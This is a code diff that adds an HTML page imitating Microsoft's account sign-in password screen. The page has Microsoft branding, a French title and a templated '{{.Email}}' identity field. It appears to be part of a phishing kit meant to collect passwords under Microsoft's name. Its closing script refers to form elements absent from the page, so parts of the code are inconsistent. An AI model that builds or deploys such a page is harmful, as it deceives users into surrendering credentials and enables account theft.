--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -1,1 +1,44 @@
+<!DOCTYPE html>
+<html lang="fr" style="filter: invert(0);">
+<head><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+	<!-- <base href="https://lemonware.fr/static/template/Template/microsoft-login/"f /> -->
+	<link href="assets/favicon.ico" rel="icon" />
+	<title>Connectez-vous à votre compte Microsoft</title>
+	<link href="assets/app.css" rel="stylesheet" />
+</head>
+<body>
+<section id="section_pwd" class="d-none">
+        <div class="auth-wrapper">
+            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
+            <div class="identity w-100 mt-16 mb-16">
+                <button class="back">
+                    <img src="assets/back.png" />
+                </button>
+                <span id="user_identity">{{.Email}}</span>
+            </div>
+            <h2 class="title mb-16">Enter password</h2>
+            <form>
+                <div class="mb-16">
+                    <p id="error_pwd" class="error"></p>
+                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
+                </div>
+            </form>
+            <div>
+                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
+                <p class="mb-16">
+                    <a href="#" class="link fs-13">Other ways to sign in</a>
+                </p>
+            </div>
+            <div>
+                <button class="btn" id="btn_sig">Sign in</button>
+            </div>
+        </div>
+    </section>
 
+<footer class="footer"><a href="#">Conditions d'utilisation</a> <a href="#">Confidentialité et cookies</a> <span>. . .</span></footer>
+<!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
+        document.getElementById('btn_next').addEventListener('click', function() {
+            document.getElementById('signin_form').submit(); // Soumet le formulaire
+        });
+    </script></body>
+</html>
